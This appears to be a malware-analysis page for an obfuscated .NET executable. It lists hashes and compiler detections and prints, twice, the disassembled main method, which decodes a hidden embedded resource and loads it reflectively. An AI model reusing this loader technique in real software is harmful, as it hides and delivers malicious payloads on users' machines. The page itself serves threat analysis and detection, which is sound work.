4ec2073771503e3a3cc46f6fec2983cf

PE Executable
|
MD5: 4ec2073771503e3a3cc46f6fec2983cf
|
Size: 1.03 MB
|
application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	4ec2073771503e3a3cc46f6fec2983cf
Sha1	6f26162eba4882ecf9fa8a3b5f05c5f6632df4b9
Sha256	36d359de0808170809afdb8fa45e4403644de6eb4921eab83917d2952f3b6e2e
Sha384	d87e375822f8c7d8b098168137c0f1350ddac2cb561d21481963e7b9ec136e278766a58ad55c18f2f692bed231b65868
Sha512	e23c6805a008b988792d6b2af735d1fbe24a8422d2df387c5ca74a7573b3a13a0e4c2b5b5d9cf2ac17e7727b83223aea1eef8c8a2298e2d07daa94f834f9592c
SSDeep	24576:+FrsRHGAWq6/p3ojZPG/5Lx3bG3yjyOqgo:L5GAmOdPGFNaROqgo
TLSH	6E25F10613E84AA9F9BF87788074111197F4F897C676EB6FAD4D90E81D22B90DB42373

PeID

.NET executable

Microsoft Visual C# / Basic .NET

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL

Microsoft Visual C# v7.0 / Basic .NET

Microsoft Visual Studio .NET

File Structure

Informations

Name0	Value
Info	PE Detect: PeReader OK (file layout)
Module Name	iEx8k
Full Name	iEx8k
EntryPoint	System.Void iEx8k.oKr1km6GjZc3::ty5Jt()
Scope Name	iEx8k
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	iEx8k
Assembly Version	6.4.25.125
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.6
Total Strings	719
Main Method	System.Void iEx8k.oKr1km6GjZc3::ty5Jt()
Main IL Instruction Count	196
Main IL	nop <null> nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> call System.String System.Environment::get_UserName() stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr FocusFlow call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_004A: nop ldloc.3 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> nop <null> nop <null> ldloc.3 <null> ldstr user.config call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_006F: nop ldloc.s V_4 call System.String System.IO.File::ReadAllText(System.String) stloc.s V_13 nop <null> nop <null> ldc.i4.s 26 call System.Int32 System.Math::Abs(System.Int32) stloc.s V_5 ldloca.s V_2 call System.Int64 System.DateTime::get_Ticks() conv.r8 <null> ldc.r8 1E-07 mul <null> call System.Double System.Math::Sin(System.Double) stloc.s V_6 ldloc.s V_5 call System.Object iEx8k.oKr1km6GjZc3/Srm9a7q.Fg2x0Jao::5bySwbM0E7f(System.Int32) castclass System.Object[] stloc.s V_7 ldstr resources/softwarelogo.png ldc.i4.0 <null> newarr System.Object call System.String System.String::Format(System.String,System.Object[]) stloc.s V_8 ldloc.s V_7 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_6 ldc.r8 0.5 cgt <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_00D3: nop ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> nop <null> nop <null> ldloc.s V_7 ldc.i4.2 <null> ldloc.s V_7 ldc.i4.0 <null> ldelem.ref <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] iEx8k.tQd8y6AaNw9/0wyCf4HtyZa9.6Xy_t4qZwH1z3::7m_NyfL89gaCS(System.String) stelem.ref <null> call System.DateTime System.DateTime::get_UtcNow() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Day() ldc.i4.s 17 mul.ovf <null> ldloc.1 <null> callvirt System.Int32 System.String::get_Length() ldc.i4.3 <null> mul.ovf <null> add.ovf <null> stloc.s V_9 ldloc.s V_7 ldc.i4.3 <null> ldloc.s V_7 ldc.i4.2 <null> ldelem.ref <null> castclass System.Byte[] call System.Byte[] iEx8k.Jo9_ytZ3/5EypMe1zxp.mJm32diFH6::xM_8Rx(System.Byte[]) stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> isinst System.Byte[] brfalse.s IL_0130: ldc.i4.0 ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldlen <null> conv.i4 <null> ldc.i4.s 100 cgt <null> br.s IL_0131: stloc.s V_16 ldc.i4.0 <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_0151: nop ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.0 <null> ldelem.u1 <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.1 <null> ldelem.u1 <null> xor <null> stloc.s V_17 nop <null> nop <null> ldc.i4.1 <null> stloc.s V_10 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.6 <null> blt.s IL_017A: ldc.i4.1 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.s 22 cgt <null> br.s IL_017B: stloc.s V_18 ldc.i4.1 <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_0185: nop ldc.i4.1 <null> stloc.s V_10 nop <null> nop <null> ldloc.s V_10 stloc.s V_19 ldloc.s V_19 brfalse.s IL_01A3: nop ldstr L o a d ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) call System.Object iEx8k.Jo9_ytZ3/qYw0i8Et6woW.9njDB3cqs::jDc35i(System.String,System.Object) pop <null> nop <null> nop <null> ldnull <null> stloc.s V_7 call System.Void System.GC::Collect() nop <null> leave.s IL_01D0: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 nop <null> nop <null> leave.s IL_01C8: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: nop nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01D0: nop nop <null> ret <null>
Module Name	iEx8k
Full Name	iEx8k
EntryPoint	System.Void iEx8k.oKr1km6GjZc3::ty5Jt()
Scope Name	iEx8k
Scope Type	ModuleDef
Kind	Windows
Runtime Version	v4.0.30319
Tables Header Version	512
WinMD Version	<null>
Assembly Name	iEx8k
Assembly Version	6.4.25.125
Assembly Culture	<null>
Has PublicKey	False
PublicKey Token	<null>
Target Framework	.NETFramework,Version=v4.6
Total Strings	719
Main Method	System.Void iEx8k.oKr1km6GjZc3::ty5Jt()
Main IL Instruction Count	196
Main IL	nop <null> nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> call System.String System.Environment::get_UserName() stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr FocusFlow call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_004A: nop ldloc.3 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> nop <null> nop <null> ldloc.3 <null> ldstr user.config call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_006F: nop ldloc.s V_4 call System.String System.IO.File::ReadAllText(System.String) stloc.s V_13 nop <null> nop <null> ldc.i4.s 26 call System.Int32 System.Math::Abs(System.Int32) stloc.s V_5 ldloca.s V_2 call System.Int64 System.DateTime::get_Ticks() conv.r8 <null> ldc.r8 1E-07 mul <null> call System.Double System.Math::Sin(System.Double) stloc.s V_6 ldloc.s V_5 call System.Object iEx8k.oKr1km6GjZc3/Srm9a7q.Fg2x0Jao::5bySwbM0E7f(System.Int32) castclass System.Object[] stloc.s V_7 ldstr resources/softwarelogo.png ldc.i4.0 <null> newarr System.Object call System.String System.String::Format(System.String,System.Object[]) stloc.s V_8 ldloc.s V_7 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_6 ldc.r8 0.5 cgt <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_00D3: nop ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> nop <null> nop <null> ldloc.s V_7 ldc.i4.2 <null> ldloc.s V_7 ldc.i4.0 <null> ldelem.ref <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] iEx8k.tQd8y6AaNw9/0wyCf4HtyZa9.6Xy_t4qZwH1z3::7m_NyfL89gaCS(System.String) stelem.ref <null> call System.DateTime System.DateTime::get_UtcNow() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Day() ldc.i4.s 17 mul.ovf <null> ldloc.1 <null> callvirt System.Int32 System.String::get_Length() ldc.i4.3 <null> mul.ovf <null> add.ovf <null> stloc.s V_9 ldloc.s V_7 ldc.i4.3 <null> ldloc.s V_7 ldc.i4.2 <null> ldelem.ref <null> castclass System.Byte[] call System.Byte[] iEx8k.Jo9_ytZ3/5EypMe1zxp.mJm32diFH6::xM_8Rx(System.Byte[]) stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> isinst System.Byte[] brfalse.s IL_0130: ldc.i4.0 ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldlen <null> conv.i4 <null> ldc.i4.s 100 cgt <null> br.s IL_0131: stloc.s V_16 ldc.i4.0 <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_0151: nop ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.0 <null> ldelem.u1 <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.1 <null> ldelem.u1 <null> xor <null> stloc.s V_17 nop <null> nop <null> ldc.i4.1 <null> stloc.s V_10 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.6 <null> blt.s IL_017A: ldc.i4.1 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.s 22 cgt <null> br.s IL_017B: stloc.s V_18 ldc.i4.1 <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_0185: nop ldc.i4.1 <null> stloc.s V_10 nop <null> nop <null> ldloc.s V_10 stloc.s V_19 ldloc.s V_19 brfalse.s IL_01A3: nop ldstr L o a d ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) call System.Object iEx8k.Jo9_ytZ3/qYw0i8Et6woW.9njDB3cqs::jDc35i(System.String,System.Object) pop <null> nop <null> nop <null> ldnull <null> stloc.s V_7 call System.Void System.GC::Collect() nop <null> leave.s IL_01D0: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 nop <null> nop <null> leave.s IL_01C8: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: nop nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01D0: nop nop <null> ret <null>

4ec2073771503e3a3cc46f6fec2983cf (1.03 MB)

4ec2073771503e3a3cc46f6fec2983cf

PE Executable | MD5: 4ec2073771503e3a3cc46f6fec2983cf | Size: 1.03 MB | application/x-dosexec

PE Executable
|
MD5: 4ec2073771503e3a3cc46f6fec2983cf
|
Size: 1.03 MB
|
application/x-dosexec